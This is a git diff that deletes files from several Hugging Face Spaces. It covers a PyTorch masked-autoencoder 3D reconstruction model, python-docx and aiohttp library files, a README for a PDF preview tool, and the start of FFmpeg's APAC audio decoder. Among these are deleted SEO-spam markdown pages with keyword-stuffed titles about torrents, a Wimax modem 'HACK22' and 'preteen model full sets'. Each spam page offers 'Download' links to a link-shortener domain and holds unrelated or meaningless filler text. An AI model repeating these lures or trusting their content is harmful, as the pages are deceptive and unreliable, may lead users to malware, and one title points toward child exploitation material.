else nn.Identity() - - self.norm2 = norm_layer(dim) - mlp_hidden_dim = int(dim * mlp_ratio) - self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=drop) - self.ls2 = LayerScale(dim, init_values=init_values) if init_values else nn.Identity() - self.drop_path2 = DropPath(drop_path) if drop_path > 0. else nn.Identity() - - def forward(self, x, unseen_size): - x = x + self.drop_path1(self.ls1(self.attn(self.norm1(x), unseen_size))) - x = x + self.drop_path2(self.ls2(self.mlp(self.norm2(x)))) - return x - - -class XYZPosEmbed(nn.Module): - """ Masked Autoencoder with VisionTransformer backbone - """ - def __init__(self, embed_dim): - super().__init__() - self.embed_dim = embed_dim - - self.two_d_pos_embed = nn.Parameter( - torch.zeros(1, 64 + 1, embed_dim), requires_grad=False) # fixed sin-cos embedding - - self.cls_token = nn.Parameter(torch.zeros(1, 1, embed_dim)) - self.win_size = 8 - - self.pos_embed = nn.Linear(3, embed_dim) - - self.blocks = nn.ModuleList([ - Block(embed_dim, num_heads=12, mlp_ratio=2.0, qkv_bias=True, norm_layer=partial(nn.LayerNorm, eps=1e-6)) - for _ in range(1) - ]) - - self.invalid_xyz_token = nn.Parameter(torch.zeros(embed_dim,)) - - self.initialize_weights() - - def initialize_weights(self): - torch.nn.init.normal_(self.cls_token, std=.02) - - two_d_pos_embed = get_2d_sincos_pos_embed(self.two_d_pos_embed.shape[-1], 8, cls_token=True) - self.two_d_pos_embed.data.copy_(torch.from_numpy(two_d_pos_embed).float().unsqueeze(0)) - - torch.nn.init.normal_(self.invalid_xyz_token, std=.02) - - def forward(self, seen_xyz, valid_seen_xyz): - emb = self.pos_embed(seen_xyz) - - emb[~valid_seen_xyz] = 0.0 - emb[~valid_seen_xyz] += self.invalid_xyz_token - - B, H, W, C = emb.shape - emb = emb.view(B, H // self.win_size, self.win_size, W // self.win_size, self.win_size, C) - emb = emb.permute(0, 1, 3, 2, 4, 5).contiguous().view(-1, self.win_size * self.win_size, C) - - emb = emb + self.two_d_pos_embed[:, 1:, :] - cls_token = self.cls_token + self.two_d_pos_embed[:, :1, :] - - cls_tokens = cls_token.expand(emb.shape[0], -1, -1) - emb = torch.cat((cls_tokens, emb), dim=1) - for _, blk in enumerate(self.blocks): - emb = blk(emb) - return emb[:, 0].view(B, (H // self.win_size) * (W // self.win_size), -1) - - -class DecodeXYZPosEmbed(nn.Module): - """ Masked Autoencoder with VisionTransformer backbone - """ - def __init__(self, embed_dim): - super().__init__() - self.embed_dim = embed_dim - self.pos_embed = nn.Linear(3, embed_dim) - - def forward(self, unseen_xyz): - return self.pos_embed(unseen_xyz) - - -class MCC(nn.Module): - """ Masked Autoencoder with VisionTransformer backbone - """ - def __init__(self, - img_size=224, patch_size=16, in_chans=3, - embed_dim=1024, depth=24, num_heads=16, - decoder_embed_dim=512, decoder_depth=8, decoder_num_heads=16, - mlp_ratio=4., norm_layer=nn.LayerNorm, - rgb_weight=1.0, occupancy_weight=1.0, args=None): - super().__init__() - - self.rgb_weight = rgb_weight - self.occupancy_weight = occupancy_weight - self.args = args - - # -------------------------------------------------------------------------- - # encoder specifics - self.patch_embed = PatchEmbed(img_size, patch_size, in_chans, embed_dim) - num_patches = self.patch_embed.num_patches - - self.cls_token = nn.Parameter(torch.zeros(1, 1, embed_dim)) - self.cls_token_xyz = nn.Parameter(torch.zeros(1, 1, embed_dim)) - self.pos_embed = nn.Parameter(torch.zeros(1, num_patches + 1, embed_dim), requires_grad=False) # fixed sin-cos embedding - - self.xyz_pos_embed 
= XYZPosEmbed(embed_dim) - - self.blocks = nn.ModuleList([ - Block( - embed_dim, num_heads, mlp_ratio, qkv_bias=True, norm_layer=norm_layer, - drop_path=args.drop_path - ) for i in range(depth)]) - - self.blocks_xyz = nn.ModuleList([ - Block( - embed_dim, num_heads, mlp_ratio, qkv_bias=True, norm_layer=norm_layer, - drop_path=args.drop_path - ) for i in range(depth)]) - - self.norm = norm_layer(embed_dim) - self.norm_xyz = norm_layer(embed_dim) - self.cached_enc_feat = None - - # -------------------------------------------------------------------------- - # decoder specifics - self.decoder_embed = nn.Linear( - embed_dim * 2, - decoder_embed_dim, - bias=True - ) - - self.decoder_xyz_pos_embed = DecodeXYZPosEmbed(decoder_embed_dim) - self.decoder_pos_embed = nn.Parameter(torch.zeros(1, num_patches + 1, decoder_embed_dim), requires_grad=False) # fixed sin-cos embedding - - self.decoder_blocks = nn.ModuleList([ - MCCDecoderBlock( - decoder_embed_dim, decoder_num_heads, mlp_ratio, qkv_bias=True, norm_layer=norm_layer, - drop_path=args.drop_path, - args=args, - ) for i in range(decoder_depth)]) - - self.decoder_norm = norm_layer(decoder_embed_dim) - if self.args.regress_color: - self.decoder_pred = nn.Linear(decoder_embed_dim, 3 + 1, bias=True) # decoder to patch - else: - self.decoder_pred = nn.Linear(decoder_embed_dim, 256 * 3 + 1, bias=True) # decoder to patch - - self.loss_occupy = nn.BCEWithLogitsLoss() - if self.args.regress_color: - self.loss_rgb = nn.MSELoss() - else: - self.loss_rgb = nn.CrossEntropyLoss() - - self.initialize_weights() - - def initialize_weights(self): - - pos_embed = get_2d_sincos_pos_embed(self.pos_embed.shape[-1], int(self.patch_embed.num_patches**.5), cls_token=True) - self.pos_embed.data.copy_(torch.from_numpy(pos_embed).float().unsqueeze(0)) - - decoder_pos_embed = get_2d_sincos_pos_embed(self.decoder_pos_embed.shape[-1], int(self.patch_embed.num_patches**.5), cls_token=True) - self.decoder_pos_embed.data.copy_(torch.from_numpy(decoder_pos_embed).float().unsqueeze(0)) - - # initialize patch_embed like nn.Linear (instead of nn.Conv2d) - w = self.patch_embed.proj.weight.data - torch.nn.init.xavier_uniform_(w.view([w.shape[0], -1])) - - # timm's trunc_normal_(std=.02) is effectively normal_(std=0.02) as cutoff is too big (2.) 
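-        # (Clarification, assuming timm's default bounds a=-2., b=2. for trunc_normal_: those bounds
-        #  are absolute cutoffs rather than multiples of std, so with std=0.02 they sit roughly 100
-        #  standard deviations out and essentially nothing would ever be truncated - hence the plain
-        #  normal_ calls below give the same distribution.)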
- torch.nn.init.normal_(self.cls_token, std=.02) - torch.nn.init.normal_(self.cls_token_xyz, std=.02) - - # initialize nn.Linear and nn.LayerNorm - self.apply(self._init_weights) - - def _init_weights(self, m): - if isinstance(m, nn.Linear): - # we use xavier_uniform following official JAX ViT: - torch.nn.init.xavier_uniform_(m.weight) - if isinstance(m, nn.Linear) and m.bias is not None: - nn.init.constant_(m.bias, 0) - elif isinstance(m, nn.LayerNorm): - nn.init.constant_(m.bias, 0) - nn.init.constant_(m.weight, 1.0) - - - def forward_encoder(self, x, seen_xyz, valid_seen_xyz): - - # get tokens - x = self.patch_embed(x) - x = x + self.pos_embed[:, 1:, :] - y = self.xyz_pos_embed(seen_xyz, valid_seen_xyz) - - ##### forward E_XYZ ##### - # append cls token - cls_token_xyz = self.cls_token_xyz - cls_tokens_xyz = cls_token_xyz.expand(y.shape[0], -1, -1) - - y = torch.cat((cls_tokens_xyz, y), dim=1) - # apply Transformer blocks - for blk in self.blocks_xyz: - y = blk(y) - y = self.norm_xyz(y) - - ##### forward E_RGB ##### - # append cls token - cls_token = self.cls_token + self.pos_embed[:, :1, :] - cls_tokens = cls_token.expand(x.shape[0], -1, -1) - - x = torch.cat((cls_tokens, x), dim=1) - # apply Transformer blocks - for blk in self.blocks: - x = blk(x) - x = self.norm(x) - - # combine encodings - x = torch.cat([x, y], dim=2) - return x - - def forward_decoder(self, x, unseen_xyz): - # embed tokens - x = self.decoder_embed(x) - x = x + self.decoder_pos_embed - - # 3D pos embed - unseen_xyz = self.decoder_xyz_pos_embed(unseen_xyz) - x = torch.cat([x, unseen_xyz], dim=1) - - # apply Transformer blocks - for blk in self.decoder_blocks: - x = blk(x, unseen_xyz.shape[1]) - - x = self.decoder_norm(x) - - # predictor projection - pred = self.decoder_pred(x) - # remove cls & seen token - pred = pred[:, -unseen_xyz.shape[1]:, :] - - return pred - - def forward_loss(self, pred, unseen_occupy, unseen_rgb): - loss = self.loss_occupy( - pred[:, :, :1].reshape((-1, 1)), - unseen_occupy.reshape((-1, 1)).float() - ) * self.occupancy_weight - - if unseen_occupy.sum() > 0: - if self.args.regress_color: - pred_rgb = pred[:, :, 1:][unseen_occupy.bool()] - gt_rgb = unseen_rgb[unseen_occupy.bool()] - else: - pred_rgb = pred[:, :, 1:][unseen_occupy.bool()].reshape((-1, 256)) - gt_rgb = torch.round(unseen_rgb[unseen_occupy.bool()] * 255).long().reshape((-1,)) - - rgb_loss = self.loss_rgb(pred_rgb, gt_rgb) * self.rgb_weight - loss = loss + rgb_loss - return loss - - - def clear_cache(self): - self.cached_enc_feat = None - - def forward(self, seen_images, seen_xyz, unseen_xyz, unseen_rgb, unseen_occupy, valid_seen_xyz, - cache_enc=False): - - unseen_xyz = shrink_points_beyond_threshold(unseen_xyz, self.args.shrink_threshold) - - if self.cached_enc_feat is None: - seen_images = preprocess_img(seen_images) - seen_xyz = shrink_points_beyond_threshold(seen_xyz, self.args.shrink_threshold) - latent = self.forward_encoder(seen_images, seen_xyz, valid_seen_xyz) - - if cache_enc: - if self.cached_enc_feat is None: - self.cached_enc_feat = latent - else: - latent = self.cached_enc_feat - - pred = self.forward_decoder(latent, unseen_xyz) - loss = self.forward_loss(pred, unseen_occupy, unseen_rgb) - return loss, pred - - -def get_mcc_model(**kwargs): - return MCC( - embed_dim=768, depth=12, num_heads=12, - decoder_embed_dim=512, decoder_depth=8, decoder_num_heads=16, - mlp_ratio=4, norm_layer=partial(nn.LayerNorm, eps=1e-6), **kwargs - ) - - -def shrink_points_beyond_threshold(xyz, threshold): - xyz = xyz.clone().detach() - 
dist = (xyz ** 2.0).sum(axis=-1) ** 0.5 - affected = (dist > threshold) * torch.isfinite(dist) - xyz[affected] = xyz[affected] * ( - threshold * (2.0 - threshold / dist[affected]) / dist[affected] - )[..., None] - return xyz - - -def preprocess_img(x): - if x.shape[2] != 224: - assert x.shape[2] == 800 - x = F.interpolate( - x, - scale_factor=224./800., - mode="bilinear", - ) - resnet_mean = torch.tensor([0.485, 0.456, 0.406], device=x.device).reshape((1, 3, 1, 1)) - resnet_std = torch.tensor([0.229, 0.224, 0.225], device=x.device).reshape((1, 3, 1, 1)) - imgs_normed = (x - resnet_mean) / resnet_std - return imgs_normed - - -class LayerScale(nn.Module): - def __init__(self, dim, init_values=1e-5, inplace=False): - super().__init__() - self.inplace = inplace - self.gamma = nn.Parameter(init_values * torch.ones(dim)) - - def forward(self, x): - return x.mul_(self.gamma) if self.inplace else x * self.gamma diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/contourpy/util/__init__.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/contourpy/util/__init__.py deleted file mode 100644 index fe33fcef1e18d2a4b92287e434cf6b1257e4274f..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/contourpy/util/__init__.py +++ /dev/null @@ -1,5 +0,0 @@ -from __future__ import annotations - -from contourpy.util._build_config import build_config - -__all__ = ["build_config"] diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/docx/oxml/ns.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/docx/oxml/ns.py deleted file mode 100644 index 6b0861284f1f31971b95beb8660a7b19be6d10cc..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/docx/oxml/ns.py +++ /dev/null @@ -1,114 +0,0 @@ -# encoding: utf-8 - -""" -Namespace-related objects. -""" - -from __future__ import absolute_import, print_function, unicode_literals - - -nsmap = { - "a": "http://schemas.openxmlformats.org/drawingml/2006/main", - "c": "http://schemas.openxmlformats.org/drawingml/2006/chart", - "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties", - "dc": "http://purl.org/dc/elements/1.1/", - "dcmitype": "http://purl.org/dc/dcmitype/", - "dcterms": "http://purl.org/dc/terms/", - "dgm": "http://schemas.openxmlformats.org/drawingml/2006/diagram", - "m": "http://schemas.openxmlformats.org/officeDocument/2006/math", - "pic": "http://schemas.openxmlformats.org/drawingml/2006/picture", - "r": "http://schemas.openxmlformats.org/officeDocument/2006/relationships", - "sl": "http://schemas.openxmlformats.org/schemaLibrary/2006/main", - "w": "http://schemas.openxmlformats.org/wordprocessingml/2006/main", - 'w14': "http://schemas.microsoft.com/office/word/2010/wordml", - "wp": "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing", - "xml": "http://www.w3.org/XML/1998/namespace", - "xsi": "http://www.w3.org/2001/XMLSchema-instance", -} - -pfxmap = dict((value, key) for key, value in nsmap.items()) - - -class NamespacePrefixedTag(str): - """ - Value object that knows the semantics of an XML tag having a namespace - prefix. 
- """ - def __new__(cls, nstag, *args): - return super(NamespacePrefixedTag, cls).__new__(cls, nstag) - - def __init__(self, nstag): - self._pfx, self._local_part = nstag.split(':') - self._ns_uri = nsmap[self._pfx] - - @property - def clark_name(self): - return '{%s}%s' % (self._ns_uri, self._local_part) - - @classmethod - def from_clark_name(cls, clark_name): - nsuri, local_name = clark_name[1:].split('}') - nstag = '%s:%s' % (pfxmap[nsuri], local_name) - return cls(nstag) - - @property - def local_part(self): - """ - Return the local part of the tag as a string. E.g. 'foobar' is - returned for tag 'f:foobar'. - """ - return self._local_part - - @property - def nsmap(self): - """ - Return a dict having a single member, mapping the namespace prefix of - this tag to it's namespace name (e.g. {'f': 'http://foo/bar'}). This - is handy for passing to xpath calls and other uses. - """ - return {self._pfx: self._ns_uri} - - @property - def nspfx(self): - """ - Return the string namespace prefix for the tag, e.g. 'f' is returned - for tag 'f:foobar'. - """ - return self._pfx - - @property - def nsuri(self): - """ - Return the namespace URI for the tag, e.g. 'http://foo/bar' would be - returned for tag 'f:foobar' if the 'f' prefix maps to - 'http://foo/bar' in nsmap. - """ - return self._ns_uri - - -def nsdecls(*prefixes): - """ - Return a string containing a namespace declaration for each of the - namespace prefix strings, e.g. 'p', 'ct', passed as *prefixes*. - """ - return ' '.join(['xmlns:%s="%s"' % (pfx, nsmap[pfx]) for pfx in prefixes]) - - -def nspfxmap(*nspfxs): - """ - Return a dict containing the subset namespace prefix mappings specified by - *nspfxs*. Any number of namespace prefixes can be supplied, e.g. - namespaces('a', 'r', 'p'). - """ - return dict((pfx, nsmap[pfx]) for pfx in nspfxs) - - -def qn(tag): - """ - Stands for "qualified name", a utility function to turn a namespace - prefixed tag name into a Clark-notation qualified tag name for lxml. For - example, ``qn('p:cSld')`` returns ``'{http://schemas.../main}cSld'``. - """ - prefix, tagroot = tag.split(':') - uri = nsmap[prefix] - return '{%s}%s' % (uri, tagroot) diff --git a/spaces/chuanenlin/pdf2preview/README.md b/spaces/chuanenlin/pdf2preview/README.md deleted file mode 100644 index 105ad2a0a22e4704bf585c1d7a27e6532476f392..0000000000000000000000000000000000000000 --- a/spaces/chuanenlin/pdf2preview/README.md +++ /dev/null @@ -1,43 +0,0 @@ ---- -title: PDF ➡️ Preview -emoji: 📄 -colorFrom: purple -colorTo: purple -sdk: streamlit -app_file: pdf2preview.py ---- - -# PDF ➡️ Preview - -A simple tool to save me time on Illustrator. Generates a preview image for a PDF file. Useful for sneak peeks to academic publications on project websites or presentation slides. - -![Example](/Users/david/Home/CMU/Notes/images/example-6133654.png) - ---- - -## Try it out! - -http://pdf2preview.chuanenlin.com - ---- - -## Setting up - -1. Clone the repository. - -```python -git clone https://github.com/chuanenlin/pdf2preview.git -cd pdf2preview -``` - -2. Install package dependencies. - -```python -pip install -r requirements.txt -``` - -3. Run the app. 
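-By default, the command below starts a local Streamlit server at http://localhost:8501 (pass `--server.port` to use a different port).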
- -```python -streamlit run pdf2preview.py -``` diff --git a/spaces/cihyFjudo/fairness-paper-search/Andre Gagnon Collection 1975 2003 Torrent 43 Goddess Encarta Pena HOT.md b/spaces/cihyFjudo/fairness-paper-search/Andre Gagnon Collection 1975 2003 Torrent 43 Goddess Encarta Pena HOT.md deleted file mode 100644 index 111fef33ea2843e8f471b5e1b5c4e5ccb5ea0c89..0000000000000000000000000000000000000000 --- a/spaces/cihyFjudo/fairness-paper-search/Andre Gagnon Collection 1975 2003 Torrent 43 Goddess Encarta Pena HOT.md +++ /dev/null @@ -1,6 +0,0 @@ -

Andre Gagnon Collection 1975 2003 Torrent 43 goddess encarta pena


Download File ››››› https://tinurli.com/2uwjbk



- - aaccfb2cb3
-
-
-

diff --git a/spaces/cihyFjudo/fairness-paper-search/Cherish Preteen Model Full Sets.md b/spaces/cihyFjudo/fairness-paper-search/Cherish Preteen Model Full Sets.md deleted file mode 100644 index 92b1e53c7109ec00acb072fa32581ef3cf15c124..0000000000000000000000000000000000000000 --- a/spaces/cihyFjudo/fairness-paper-search/Cherish Preteen Model Full Sets.md +++ /dev/null @@ -1,5 +0,0 @@ -
-

At HABA, we love creating timeless toys like puppets, block sets, and so much more. Our collection of hand puppets is full of unique, fantasy-inspired designs. From a classic princess puppet to a musical donkey, your child will be able to create their own stories featuring an exciting cast of characters!

-

cherish preteen model full sets


DOWNLOADhttps://tinurli.com/2uwj7v



aaccfb2cb3
-
-
\ No newline at end of file diff --git a/spaces/cihyFjudo/fairness-paper-search/IL Portiere Di Reestraat 16 Parte 2 2014 The Shocking Revelations of the Doorman of Reestraat 16.md b/spaces/cihyFjudo/fairness-paper-search/IL Portiere Di Reestraat 16 Parte 2 2014 The Shocking Revelations of the Doorman of Reestraat 16.md deleted file mode 100644 index 431394c5e2f70b2bfed18e83804a98380b569030..0000000000000000000000000000000000000000 --- a/spaces/cihyFjudo/fairness-paper-search/IL Portiere Di Reestraat 16 Parte 2 2014 The Shocking Revelations of the Doorman of Reestraat 16.md +++ /dev/null @@ -1,6 +0,0 @@ -

IL Portiere Di Reestraat 16 Parte 2 2014


Download ❤❤❤ https://tinurli.com/2uwk0j



-
- aaccfb2cb3
-
-
-

diff --git a/spaces/cihyFjudo/fairness-paper-search/Motorola Wimax CPEi 23825 HACK22 Learn How to Upgrade Your Wimax Modem with RJX 50 Tamlam.md b/spaces/cihyFjudo/fairness-paper-search/Motorola Wimax CPEi 23825 HACK22 Learn How to Upgrade Your Wimax Modem with RJX 50 Tamlam.md deleted file mode 100644 index 370e17430eaf9989429c1f41267eafb569178c2d..0000000000000000000000000000000000000000 --- a/spaces/cihyFjudo/fairness-paper-search/Motorola Wimax CPEi 23825 HACK22 Learn How to Upgrade Your Wimax Modem with RJX 50 Tamlam.md +++ /dev/null @@ -1,6 +0,0 @@ -

Motorola Wimax CPEi 23825 HACK22


Download Zip »»» https://tinurli.com/2uwiM5



-
- aaccfb2cb3
-
-
-

diff --git a/spaces/cihyFjudo/fairness-paper-search/[Desktop Themes - Microsoft Support](3).md b/spaces/cihyFjudo/fairness-paper-search/[Desktop Themes - Microsoft Support](3).md deleted file mode 100644 index 12eb007f686effb9b14e2908c7bf8c906ed25ec3..0000000000000000000000000000000000000000 --- a/spaces/cihyFjudo/fairness-paper-search/[Desktop Themes - Microsoft Support](3).md +++ /dev/null @@ -1,6 +0,0 @@ -

Windows 8 Theme Pack For Pc Free 15 einstufungstest vera


Download Filehttps://tinurli.com/2uwiRH



-
- aaccfb2cb3
-
-
-

diff --git a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/aiohttp/http.py b/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/aiohttp/http.py deleted file mode 100644 index ca9dc54b215f7977970658250f23e3be137f1b3e..0000000000000000000000000000000000000000 --- a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/aiohttp/http.py +++ /dev/null @@ -1,70 +0,0 @@ -import http.server -import sys -from typing import Mapping, Tuple - -from . import __version__ -from .http_exceptions import HttpProcessingError as HttpProcessingError -from .http_parser import ( - HeadersParser as HeadersParser, - HttpParser as HttpParser, - HttpRequestParser as HttpRequestParser, - HttpResponseParser as HttpResponseParser, - RawRequestMessage as RawRequestMessage, - RawResponseMessage as RawResponseMessage, -) -from .http_websocket import ( - WS_CLOSED_MESSAGE as WS_CLOSED_MESSAGE, - WS_CLOSING_MESSAGE as WS_CLOSING_MESSAGE, - WS_KEY as WS_KEY, - WebSocketError as WebSocketError, - WebSocketReader as WebSocketReader, - WebSocketWriter as WebSocketWriter, - WSCloseCode as WSCloseCode, - WSMessage as WSMessage, - WSMsgType as WSMsgType, - ws_ext_gen as ws_ext_gen, - ws_ext_parse as ws_ext_parse, -) -from .http_writer import ( - HttpVersion as HttpVersion, - HttpVersion10 as HttpVersion10, - HttpVersion11 as HttpVersion11, - StreamWriter as StreamWriter, -) - -__all__ = ( - "HttpProcessingError", - "RESPONSES", - "SERVER_SOFTWARE", - # .http_writer - "StreamWriter", - "HttpVersion", - "HttpVersion10", - "HttpVersion11", - # .http_parser - "HeadersParser", - "HttpParser", - "HttpRequestParser", - "HttpResponseParser", - "RawRequestMessage", - "RawResponseMessage", - # .http_websocket - "WS_CLOSED_MESSAGE", - "WS_CLOSING_MESSAGE", - "WS_KEY", - "WebSocketReader", - "WebSocketWriter", - "ws_ext_gen", - "ws_ext_parse", - "WSMessage", - "WebSocketError", - "WSMsgType", - "WSCloseCode", -) - - -SERVER_SOFTWARE: str = "Python/{0[0]}.{0[1]} aiohttp/{1}".format( - sys.version_info, __version__ -) - -RESPONSES: Mapping[int, Tuple[str, str]] = http.server.BaseHTTPRequestHandler.responses diff --git a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/anyio/_core/_compat.py b/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/anyio/_core/_compat.py deleted file mode 100644 index 22d29ab8ac303756047d105dadafcfd5107563ef..0000000000000000000000000000000000000000 --- a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/anyio/_core/_compat.py +++ /dev/null @@ -1,217 +0,0 @@ -from __future__ import annotations - -from abc import ABCMeta, abstractmethod -from contextlib import AbstractContextManager -from types import TracebackType -from typing import ( - TYPE_CHECKING, - Any, - AsyncContextManager, - Callable, - ContextManager, - Generator, - Generic, - Iterable, - List, - TypeVar, - Union, - overload, -) -from warnings import warn - -if TYPE_CHECKING: - from ._testing import TaskInfo -else: - TaskInfo = object - -T = TypeVar("T") -AnyDeprecatedAwaitable = Union[ - "DeprecatedAwaitable", - "DeprecatedAwaitableFloat", - "DeprecatedAwaitableList[T]", - TaskInfo, -] - - -@overload -async def maybe_async(__obj: TaskInfo) -> TaskInfo: - ... - - -@overload -async def maybe_async(__obj: DeprecatedAwaitableFloat) -> float: - ... - - -@overload -async def maybe_async(__obj: DeprecatedAwaitableList[T]) -> list[T]: - ... - - -@overload -async def maybe_async(__obj: DeprecatedAwaitable) -> None: - ... 
- - -async def maybe_async( - __obj: AnyDeprecatedAwaitable[T], -) -> TaskInfo | float | list[T] | None: - """ - Await on the given object if necessary. - - This function is intended to bridge the gap between AnyIO 2.x and 3.x where some functions and - methods were converted from coroutine functions into regular functions. - - Do **not** try to use this for any other purpose! - - :return: the result of awaiting on the object if coroutine, or the object itself otherwise - - .. versionadded:: 2.2 - - """ - return __obj._unwrap() - - -class _ContextManagerWrapper: - def __init__(self, cm: ContextManager[T]): - self._cm = cm - - async def __aenter__(self) -> T: - return self._cm.__enter__() - - async def __aexit__( - self, - exc_type: type[BaseException] | None, - exc_val: BaseException | None, - exc_tb: TracebackType | None, - ) -> bool | None: - return self._cm.__exit__(exc_type, exc_val, exc_tb) - - -def maybe_async_cm( - cm: ContextManager[T] | AsyncContextManager[T], -) -> AsyncContextManager[T]: - """ - Wrap a regular context manager as an async one if necessary. - - This function is intended to bridge the gap between AnyIO 2.x and 3.x where some functions and - methods were changed to return regular context managers instead of async ones. - - :param cm: a regular or async context manager - :return: an async context manager - - .. versionadded:: 2.2 - - """ - if not isinstance(cm, AbstractContextManager): - raise TypeError("Given object is not an context manager") - - return _ContextManagerWrapper(cm) - - -def _warn_deprecation( - awaitable: AnyDeprecatedAwaitable[Any], stacklevel: int = 1 -) -> None: - warn( - f'Awaiting on {awaitable._name}() is deprecated. Use "await ' - f"anyio.maybe_async({awaitable._name}(...)) if you have to support both AnyIO 2.x " - f'and 3.x, or just remove the "await" if you are completely migrating to AnyIO 3+.', - DeprecationWarning, - stacklevel=stacklevel + 1, - ) - - -class DeprecatedAwaitable: - def __init__(self, func: Callable[..., DeprecatedAwaitable]): - self._name = f"{func.__module__}.{func.__qualname__}" - - def __await__(self) -> Generator[None, None, None]: - _warn_deprecation(self) - if False: - yield - - def __reduce__(self) -> tuple[type[None], tuple[()]]: - return type(None), () - - def _unwrap(self) -> None: - return None - - -class DeprecatedAwaitableFloat(float): - def __new__( - cls, x: float, func: Callable[..., DeprecatedAwaitableFloat] - ) -> DeprecatedAwaitableFloat: - return super().__new__(cls, x) - - def __init__(self, x: float, func: Callable[..., DeprecatedAwaitableFloat]): - self._name = f"{func.__module__}.{func.__qualname__}" - - def __await__(self) -> Generator[None, None, float]: - _warn_deprecation(self) - if False: - yield - - return float(self) - - def __reduce__(self) -> tuple[type[float], tuple[float]]: - return float, (float(self),) - - def _unwrap(self) -> float: - return float(self) - - -class DeprecatedAwaitableList(List[T]): - def __init__( - self, - iterable: Iterable[T] = (), - *, - func: Callable[..., DeprecatedAwaitableList[T]], - ): - super().__init__(iterable) - self._name = f"{func.__module__}.{func.__qualname__}" - - def __await__(self) -> Generator[None, None, list[T]]: - _warn_deprecation(self) - if False: - yield - - return list(self) - - def __reduce__(self) -> tuple[type[list[T]], tuple[list[T]]]: - return list, (list(self),) - - def _unwrap(self) -> list[T]: - return list(self) - - -class DeprecatedAsyncContextManager(Generic[T], metaclass=ABCMeta): - @abstractmethod - def __enter__(self) -> T: - 
pass - - @abstractmethod - def __exit__( - self, - exc_type: type[BaseException] | None, - exc_val: BaseException | None, - exc_tb: TracebackType | None, - ) -> bool | None: - pass - - async def __aenter__(self) -> T: - warn( - f"Using {self.__class__.__name__} as an async context manager has been deprecated. " - f'Use "async with anyio.maybe_async_cm(yourcontextmanager) as foo:" if you have to ' - f'support both AnyIO 2.x and 3.x, or just remove the "async" from "async with" if ' - f"you are completely migrating to AnyIO 3+.", - DeprecationWarning, - ) - return self.__enter__() - - async def __aexit__( - self, - exc_type: type[BaseException] | None, - exc_val: BaseException | None, - exc_tb: TracebackType | None, - ) -> bool | None: - return self.__exit__(exc_type, exc_val, exc_tb) diff --git a/spaces/cloudwp/simpleGPT/README.md b/spaces/cloudwp/simpleGPT/README.md deleted file mode 100644 index 433e138a72109d1b5539211a08d895891e76597e..0000000000000000000000000000000000000000 --- a/spaces/cloudwp/simpleGPT/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: SimpleGPT -emoji: 👀 -colorFrom: blue -colorTo: purple -sdk: gradio -sdk_version: 3.24.1 -app_file: app.py -pinned: false -duplicated_from: joejoeshi/simpleGPT ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/apac.c b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/apac.c deleted file mode 100644 index 3408f75292d06e95b036940d8ffb9924a2bf67d0..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/apac.c +++ /dev/null @@ -1,278 +0,0 @@ -/* - * APAC audio decoder - * - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. 
- * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -#include "libavutil/audio_fifo.h" -#include "libavutil/internal.h" -#include "libavutil/intreadwrite.h" -#include "avcodec.h" -#include "codec_internal.h" -#include "decode.h" -#include "get_bits.h" - -typedef struct ChContext { - int have_code; - int last_sample; - int last_delta; - int bit_length; - int block_length; - uint8_t block[32 * 2]; - AVAudioFifo *samples; -} ChContext; - -typedef struct APACContext { - GetBitContext gb; - int skip; - - int cur_ch; - ChContext ch[2]; - - uint8_t *bitstream; - int64_t max_framesize; - int bitstream_size; - int bitstream_index; -} APACContext; - -static av_cold int apac_close(AVCodecContext *avctx) -{ - APACContext *s = avctx->priv_data; - - av_freep(&s->bitstream); - s->bitstream_size = 0; - - for (int ch = 0; ch < 2; ch++) { - ChContext *c = &s->ch[ch]; - - av_audio_fifo_free(c->samples); - } - - return 0; -} - -static av_cold int apac_init(AVCodecContext *avctx) -{ - APACContext *s = avctx->priv_data; - - if (avctx->bits_per_coded_sample > 8) - avctx->sample_fmt = AV_SAMPLE_FMT_S16P; - else - avctx->sample_fmt = AV_SAMPLE_FMT_U8P; - - if (avctx->ch_layout.nb_channels < 1 || - avctx->ch_layout.nb_channels > 2 || - avctx->bits_per_coded_sample < 8 || - avctx->bits_per_coded_sample > 16 - ) - return AVERROR_INVALIDDATA; - - for (int ch = 0; ch < avctx->ch_layout.nb_channels; ch++) { - ChContext *c = &s->ch[ch]; - - c->bit_length = avctx->bits_per_coded_sample; - c->block_length = 8; - c->have_code = 0; - c->samples = av_audio_fifo_alloc(avctx->sample_fmt, 1, 1024); - if (!c->samples) - return AVERROR(ENOMEM); - } - - s->max_framesize = 1024; - s->bitstream = 